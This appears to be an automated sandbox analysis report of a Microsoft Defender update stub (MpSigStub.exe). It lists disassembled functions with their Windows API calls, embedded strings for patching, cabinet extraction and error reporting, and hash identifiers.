Opcode Fuzzy Hash: 3943596eefd01f18dea060fa2ce76c56411fdc92286132ae22e1316f297c0fae
Instruction Fuzzy Hash: 6F217162E08B8483F7159B3995013B86760FBB9B44F45A324DF8E52667EF3CE2E48210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584B798, Relevance: 4.5, APIs: 3, Instructions: 13COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00000001,00007FF7B584B89D), ref: 00007FF7B584B7A3
UnhandledExceptionFilter.KERNEL32(?,?,00000001,00007FF7B584B89D), ref: 00007FF7B584B7AC
GetCurrentProcess.KERNEL32(?,?,00000001,00007FF7B584B89D), ref: 00007FF7B584B7B2

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$CurrentProcess
String ID:
API String ID: 1249254920-0
Opcode ID: 75deea78a6f82bfe24c4488798901de7a3a3eb5fdc37782de84cbef39ae5699b
Instruction ID: 01587ed5e6408f75451a6b3c723cc69225ae47a5cd9ed79a1c3d165f3247866f
Opcode Fuzzy Hash: 75deea78a6f82bfe24c4488798901de7a3a3eb5fdc37782de84cbef39ae5699b
Instruction Fuzzy Hash: E6D0C755E0850787F75877657C250356220AF7EF42F849434CB0B4537EDF7C58A54711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582E0C4, Relevance: 3.1, APIs: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(00000000,00000000,?,00007FF7B582E348), ref: 00007FF7B582E140

Part of subcall function 00007FF7B582E028: GetLengthSid.ADVAPI32 ref: 00007FF7B582E045

FreeSid.ADVAPI32 ref: 00007FF7B582E198

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateFreeInitializeLength
String ID:
API String ID: 3103710585-0
Opcode ID: 207928848fd6e835baddca6c328efc65586b14bf0efcfb8ba1ddeed804467cb5
Instruction ID: f60a91c0469d37f769bdb7c07e333c3855121bcaedfc195a6815c7712d91b945
Opcode Fuzzy Hash: 207928848fd6e835baddca6c328efc65586b14bf0efcfb8ba1ddeed804467cb5
Instruction Fuzzy Hash: 52219232B0460189FB10AB6AD4402BDB7B4BBA9B48F900536DB0D47A6EDF3DD555CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5830B00, Relevance: 2.5, APIs: 2, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7B5830B1D
HeapFree.KERNEL32 ref: 00007FF7B5830B2B

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 37c1de95f4931a60b46cac7f269872e6147e07478925c550526ee5085e11cb7a
Instruction ID: aacdc2fd06c47ad4482d835c04ac23e2f44b51b93f101eb87d39b31c4cd7eace
Opcode Fuzzy Hash: 37c1de95f4931a60b46cac7f269872e6147e07478925c550526ee5085e11cb7a
Instruction Fuzzy Hash: A8E09A10E08646C1FA15679EB4123B5A2519F7AF84FD88030DF4D023AFDE3CA4A68330

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582418C, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36eccc667992b5deded381514b495030962c07c3d4858406462ca96d2d392dac
Instruction ID: 88586b5514a560c41e94b84973790135973eed278ba280ced88e882f36391f77
Opcode Fuzzy Hash: 36eccc667992b5deded381514b495030962c07c3d4858406462ca96d2d392dac
Instruction Fuzzy Hash: C9112D7291E7C086C315DF2DA449AC836A8F304B48F689538DE4D6B3A0DBBB68639704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584BF4C, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce0f7ff9bdb2a5567bf38f0617f77ab0ba6fd1770df7ed91442e826a44568a35
Instruction ID: 0e17f7be69264d219e9c73d08131cbf56fbeb51f196401a9ffaef442e50e5b1d
Opcode Fuzzy Hash: ce0f7ff9bdb2a5567bf38f0617f77ab0ba6fd1770df7ed91442e826a44568a35
Instruction Fuzzy Hash: 1DA0012590880AD4EA44AB28A8A0024A620BB72B02BD05431DB0E420BE9F7CA8218A21

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57D6F35, Relevance: 29.0, APIs: 12, Strings: 7, Instructions: 492COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7B57D718B
CloseHandle.KERNEL32 ref: 00007FF7B57D71B8
CloseHandle.KERNEL32 ref: 00007FF7B57D71C7
CloseHandle.KERNEL32 ref: 00007FF7B57D7264
CloseHandle.KERNEL32 ref: 00007FF7B57D7291
CloseHandle.KERNEL32 ref: 00007FF7B57D72A0
CloseHandle.KERNEL32 ref: 00007FF7B57D72F2
CloseHandle.KERNEL32 ref: 00007FF7B57D742D
CloseHandle.KERNEL32 ref: 00007FF7B57D747B

Strings

Update.SigPipeBug, xrefs: 00007FF7B57D75C5
Update.ApplyPatch, xrefs: 00007FF7B57D6F8C
UtilGetFileVersion(%ws), xrefs: 00007FF7B57D745F
The patched version of %ws was version %u.%u.%u.%u, rather than what the package expected., xrefs: 00007FF7B57D7589
1.1.18500.10, xrefs: 00007FF7B57D7046, 00007FF7B57D767B
Patched %ws to %u.%u.%u.%u, xrefs: 00007FF7B57D74EF
ApplyPatch(%ws, %ws, %ws), xrefs: 00007FF7B57D7173

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: 1.1.18500.10$ApplyPatch(%ws, %ws, %ws)$Patched %ws to %u.%u.%u.%u$The patched version of %ws was version %u.%u.%u.%u, rather than what the package expected.$Update.ApplyPatch$Update.SigPipeBug$UtilGetFileVersion(%ws)
API String ID: 2962429428-494808000
Opcode ID: 1d2a59c58b9441289df11c05937ca6eb68cbf79885c2c6c16284e84370364a21
Instruction ID: cd360278cfd63c4d616f642fe10298c6031bd0fdc2a4ba8031e7f8adfe358ece
Opcode Fuzzy Hash: 1d2a59c58b9441289df11c05937ca6eb68cbf79885c2c6c16284e84370364a21
Instruction Fuzzy Hash: D1322D76609BC285DA71AB19E4403AAF3A4FB9AB40F844136CB8D43B5EDF7CD455CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57CCD90, Relevance: 27.5, APIs: 14, Strings: 4, Instructions: 458sleepCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7B57CD09F
CloseHandle.KERNEL32 ref: 00007FF7B57CD0B2
CloseHandle.KERNEL32 ref: 00007FF7B57CD133
Sleep.KERNEL32 ref: 00007FF7B57CD1C0
Sleep.KERNEL32 ref: 00007FF7B57CD24A
CloseHandle.KERNEL32 ref: 00007FF7B57CD25A
CloseHandle.KERNEL32 ref: 00007FF7B57CD297
CloseHandle.KERNEL32 ref: 00007FF7B57CD2A5

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

CloseHandle.KERNEL32 ref: 00007FF7B57CD305
CloseHandle.KERNEL32 ref: 00007FF7B57CD33C
CloseHandle.KERNEL32 ref: 00007FF7B57CD34B
CloseHandle.KERNEL32 ref: 00007FF7B57CD3AF
CloseHandle.KERNEL32 ref: 00007FF7B57CD3D3
CloseHandle.KERNEL32 ref: 00007FF7B57CD3F2

Strings

CacheMpSigStub, xrefs: 00007FF7B57CD406
Copied MpSigStub.exe to %ws, xrefs: 00007FF7B57CD41D
MpSigStub.exe, xrefs: 00007FF7B57CCE19
CopyFile(%ws, %ws), xrefs: 00007FF7B57CD433

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$Sleep$MessageTrace
String ID: CacheMpSigStub$Copied MpSigStub.exe to %ws$CopyFile(%ws, %ws)$MpSigStub.exe
API String ID: 3543835022-983350981
Opcode ID: a31742053c7625fd166238920114637f19da1e500461cfd330e8e5ca0918a2e4
Instruction ID: ed63c1f9750b6f95052b25dd2b7f720517178eb39dc026e803720e0763e14875
Opcode Fuzzy Hash: a31742053c7625fd166238920114637f19da1e500461cfd330e8e5ca0918a2e4
Instruction Fuzzy Hash: 7A129421B0868285FA14BB6D94545B9A391AF67FB8F800631DF2E476DFDF7CE4458320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E25F8, Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 181libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FF7B57E264D
GetProcAddress.KERNEL32 ref: 00007FF7B57E2663
GetProcAddress.KERNEL32 ref: 00007FF7B57E2685
GetProcAddress.KERNEL32 ref: 00007FF7B57E269D
GetLastError.KERNEL32 ref: 00007FF7B57E26B0
FreeLibrary.KERNEL32 ref: 00007FF7B57E2864

Strings

cabinet.dll, xrefs: 00007FF7B57E2630
%s\%p, xrefs: 00007FF7B57E274B
FDICreate, xrefs: 00007FF7B57E2655
FDIDestroy, xrefs: 00007FF7B57E2693
FDICopy, xrefs: 00007FF7B57E267B
UPDATEPAYLOAD, xrefs: 00007FF7B57E2744

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FreeLibrary$ErrorLast
String ID: %s\%p$FDICopy$FDICreate$FDIDestroy$UPDATEPAYLOAD$cabinet.dll
API String ID: 2207120935-848739501
Opcode ID: e832f12273e126d72f47d62498b115027ff59016e170657d65431da6a4c94aae
Instruction ID: c2c2a1a6ec7d216c8d8b403630d2dd89c9dec5d4b9a87cb019e691c189f934fd
Opcode Fuzzy Hash: e832f12273e126d72f47d62498b115027ff59016e170657d65431da6a4c94aae
Instruction Fuzzy Hash: 80815F25B1874285EA54AF1DA854279A2A8BF6EF84FC40135CF0E5376EDF3DE445C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B58541D0, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF7B58541E6
GetModuleHandleW.KERNEL32 ref: 00007FF7B58541F3
GetModuleHandleW.KERNEL32 ref: 00007FF7B5854208
GetProcAddress.KERNEL32 ref: 00007FF7B5854220
GetProcAddress.KERNEL32 ref: 00007FF7B5854233
CreateEventW.KERNEL32 ref: 00007FF7B585425F
DeleteCriticalSection.KERNEL32 ref: 00007FF7B58542AB
CloseHandle.KERNEL32 ref: 00007FF7B58542BD

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF7B58541EC
kernel32.dll, xrefs: 00007FF7B5854201
SleepConditionVariableCS, xrefs: 00007FF7B5854216
WakeAllConditionVariable, xrefs: 00007FF7B5854226

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: ed1cadf4d1e693dd7f070313958de2cd7e9a3e50aab7022ef9bf86b68717336d
Instruction ID: 567f4e5951db238897a49e4d04a407f9cebc365e8f9bcdfbb5832deac7cd26da
Opcode Fuzzy Hash: ed1cadf4d1e693dd7f070313958de2cd7e9a3e50aab7022ef9bf86b68717336d
Instruction Fuzzy Hash: BB21FD21E09A0791FB15BB19F855574A3A1AF76F42FC84035CB1E466BFEF3CE4A48220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E8E90, Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 238COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7B57E91AB

Strings

FilesToKeep=, xrefs: 00007FF7B57E9107
ReportingFlags=, xrefs: 00007FF7B57E8F1E
LoggingFlags=, xrefs: 00007FF7B57E8F48
watson_manifest.txt, xrefs: 00007FF7B57E8F84
EventType=, xrefs: 00007FF7B57E8EC4
P%lu=, xrefs: 00007FF7B57E9091
UI LCID=1033, xrefs: 00007FF7B57E8FF1
unspecified, xrefs: 00007FF7B57E90C3
General_AppName=, xrefs: 00007FF7B57E8EF4
EventLogSource=MPSampleSubmission, xrefs: 00007FF7B57E9013
Version=131072, xrefs: 00007FF7B57E8FE0
UIFlags=1, xrefs: 00007FF7B57E9002

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: EventLogSource=MPSampleSubmission$EventType=$FilesToKeep=$General_AppName=$LoggingFlags=$P%lu=$ReportingFlags=$UI LCID=1033$UIFlags=1$Version=131072$unspecified$watson_manifest.txt
API String ID: 2962429428-3729409941
Opcode ID: 877ce6ec2ccc820bb34d76a104acfe38a1ef56a98b5910bb380e9b569f7e967a
Instruction ID: 02b2045f9b2b335e6073857ada704ef7c67c23e688eb782b581a76618b0fc6da
Opcode Fuzzy Hash: 877ce6ec2ccc820bb34d76a104acfe38a1ef56a98b5910bb380e9b569f7e967a
Instruction Fuzzy Hash: 16B19462B18A42D1EB00FB19E8440ADA326FB9AB94FC05031DB0D0799EDF3CD556C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57CADCC, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FF7B57CAE8E
FreeLibrary.KERNEL32 ref: 00007FF7B57CAF06

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

FreeLibrary.KERNEL32 ref: 00007FF7B57CAFBC

Strings

LoadLibraryEx(%ws), xrefs: 00007FF7B57CAE76
SenseUpdateProvision, xrefs: 00007FF7B57CAEAE
%ws\%ws, xrefs: 00007FF7B57CADF5
PlatformUpdateTimeout, xrefs: 00007FF7B57CAF82
SenseUpdateProvision.dll, xrefs: 00007FF7B57CADEB, 00007FF7B57CAF95

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary$MessageTrace
String ID: %ws\%ws$LoadLibraryEx(%ws)$PlatformUpdateTimeout$SenseUpdateProvision$SenseUpdateProvision.dll
API String ID: 1374485190-123950635
Opcode ID: dee645cc92c2af639474d6b9e0361d88db2b9834c3697b79d2942c5acecb6c48
Instruction ID: 90baf353a80144ec652f4a369f51a64df33957bf627bdccc836b484974262607
Opcode Fuzzy Hash: dee645cc92c2af639474d6b9e0361d88db2b9834c3697b79d2942c5acecb6c48
Instruction Fuzzy Hash: 5B516B61B0864241EB11BB1DE8503B9E791AFAAF95FC40131DB0D876AFDF7DE8518360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57D2AE0, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 69COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FF7B57D2B2F
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B57D2CF2,?,?,?,?,?,00007FF7B57D6F35), ref: 00007FF7B57D2B77
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B57D2CF2,?,?,?,?,?,00007FF7B57D6F35), ref: 00007FF7B57D2BB6

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

Strings

ApplyPatchToFileByHandles, xrefs: 00007FF7B57D2B42
mspatcha.dll, xrefs: 00007FF7B57D2B01
UtilLoadSystemLibrary(mspatcha.dll), xrefs: 00007FF7B57D2B17
ApplyPatchToFileByHandles, xrefs: 00007FF7B57D2BA3
UtilGetProcAddress(ApplyPatchToFileByHandles), xrefs: 00007FF7B57D2B61

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary$ErrorLast
String ID: ApplyPatchToFileByHandles$ApplyPatchToFileByHandles$UtilGetProcAddress(ApplyPatchToFileByHandles)$UtilLoadSystemLibrary(mspatcha.dll)$mspatcha.dll
API String ID: 3043558966-152954032
Opcode ID: 29e31fff69114b4b41e4e055c9e9a51b772582ebce8b04bf83ccefcef2257795
Instruction ID: f103daa301223183e563366126fbe1ef88a4ce02dfc91f87432303ab60b885ca
Opcode Fuzzy Hash: 29e31fff69114b4b41e4e055c9e9a51b772582ebce8b04bf83ccefcef2257795
Instruction Fuzzy Hash: 79212452B1875291FB41BF19A8503B9A661AF6AFC0F844131DB0E877AEEE7CE4158221

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5853A1C, Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF7B5853B22
CreateFileW.KERNEL32 ref: 00007FF7B5853B72
GetLastError.KERNEL32 ref: 00007FF7B5853BA2
GetFileType.KERNEL32 ref: 00007FF7B5853BB7
GetLastError.KERNEL32 ref: 00007FF7B5853BC1
CloseHandle.KERNEL32 ref: 00007FF7B5853BF4
CloseHandle.KERNEL32 ref: 00007FF7B5853D58
CreateFileW.KERNEL32 ref: 00007FF7B5853D8D
GetLastError.KERNEL32 ref: 00007FF7B5853D9C

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateErrorLast$CloseHandle$Type
String ID:
API String ID: 352418905-0
Opcode ID: 90d3d9b834c21d02f5ea76a2729a2b36caa0a52972a7be79f9f2d04710b74619
Instruction ID: 23a52780a80a5bd631e407fa0bedeebaf21c97e131c0009a7f54b53a0876ade4
Opcode Fuzzy Hash: 90d3d9b834c21d02f5ea76a2729a2b36caa0a52972a7be79f9f2d04710b74619
Instruction Fuzzy Hash: 4DC1C137B28A4686EB10DF68D4906BC7761F76AFA8B410225DB2E5779ECF38D461C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57C7B8C, Relevance: 13.7, APIs: 9, Instructions: 158serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00007FF7B57C7BD6
OpenServiceW.ADVAPI32 ref: 00007FF7B57C7C39
CloseServiceHandle.ADVAPI32 ref: 00007FF7B57C7C8A
QueryServiceStatusEx.ADVAPI32 ref: 00007FF7B57C7CC3
CloseServiceHandle.ADVAPI32 ref: 00007FF7B57C7D16
CloseServiceHandle.ADVAPI32 ref: 00007FF7B57C7D65
CloseServiceHandle.ADVAPI32 ref: 00007FF7B57C7D73

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

CloseServiceHandle.ADVAPI32 ref: 00007FF7B57C7D85
CloseServiceHandle.ADVAPI32 ref: 00007FF7B57C7D93

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandle$Open$ErrorLastManagerQueryStatus
String ID:
API String ID: 328081274-0
Opcode ID: f0d7c6dc171c90eca2def9d23fc4dd47a37dfff5dda565fc02958f2f4e12c95f
Instruction ID: ca78c2378e59d064bd11603e5f74f7f72056471d697649175f6a72fc673e7b6c
Opcode Fuzzy Hash: f0d7c6dc171c90eca2def9d23fc4dd47a37dfff5dda565fc02958f2f4e12c95f
Instruction Fuzzy Hash: 5361B621F0960385FB25AB19D4402B8A3A4AF7AF98FD44135CF1E4766EEF7DE4818360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E8CD0, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 118COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF7B57E8E5A

Strings

<ClientData>, xrefs: 00007FF7B57E8D5E
</FailedFiles>, xrefs: 00007FF7B57E8E36
<FailedFiles>, xrefs: 00007FF7B57E8DE2
</ClientData>, xrefs: 00007FF7B57E8D6D
Client buffer is longer than max allowed size and had to be truncated, xrefs: 00007FF7B57E8DA7
</ClientDataWarning>, xrefs: 00007FF7B57E8DB6
<ClientDataWarning>, xrefs: 00007FF7B57E8D98
client_manifest.txt, xrefs: 00007FF7B57E8D19

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: </ClientData>$</ClientDataWarning>$</FailedFiles>$<ClientData>$<ClientDataWarning>$<FailedFiles>$Client buffer is longer than max allowed size and had to be truncated$client_manifest.txt
API String ID: 2962429428-750552617
Opcode ID: 5e163ecd6d18bfd50c837a34be58106ac46a386f08c38c90f56ca61fc6c3fd38
Instruction ID: 3652ed02091da167f338fcc584c0a6cece807b93c5d8a8446f9ea4f0a41fa5fc
Opcode Fuzzy Hash: 5e163ecd6d18bfd50c837a34be58106ac46a386f08c38c90f56ca61fc6c3fd38
Instruction Fuzzy Hash: 24414E11B4874281EA14FB2AA8050A9A365ABABFD4FC45231EF5D4769FCE7CE453C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DD884, Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 284registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B582C844: RegOpenKeyExW.ADVAPI32 ref: 00007FF7B582C877
Part of subcall function 00007FF7B582C844: RegCloseKey.ADVAPI32 ref: 00007FF7B582C8BD

RegCloseKey.ADVAPI32 ref: 00007FF7B57DD923

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

RegCloseKey.ADVAPI32 ref: 00007FF7B57DDAE0
RegCloseKey.ADVAPI32 ref: 00007FF7B57DDB51

Strings

SOFTWARE\Microsoft\MpSigStub, xrefs: 00007FF7B57DD8B8
LastStartTime, xrefs: 00007FF7B57DDA7D
LastExitCode, xrefs: 00007FF7B57DDAF7
1.1.18500.10, xrefs: 00007FF7B57DD991, 00007FF7B57DDBDB

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$MessageOpenTrace
String ID: 1.1.18500.10$LastExitCode$LastStartTime$SOFTWARE\Microsoft\MpSigStub
API String ID: 2474424771-939583000
Opcode ID: 924acfe0d1072395a1af02a44acea0edf46d2e9948d9259993968505c562201c
Instruction ID: c3e4af07cc5ed84aa8c5b81889e8c614255b43e879d2d72379e80bdd027a4f7d
Opcode Fuzzy Hash: 924acfe0d1072395a1af02a44acea0edf46d2e9948d9259993968505c562201c
Instruction Fuzzy Hash: 80E14772B08B4189EB10AB69E4406ADB7B4FB69B48F940136CF8D17B6EEF38D055C750

Uniqueness

Uniqueness Score: -1.00%

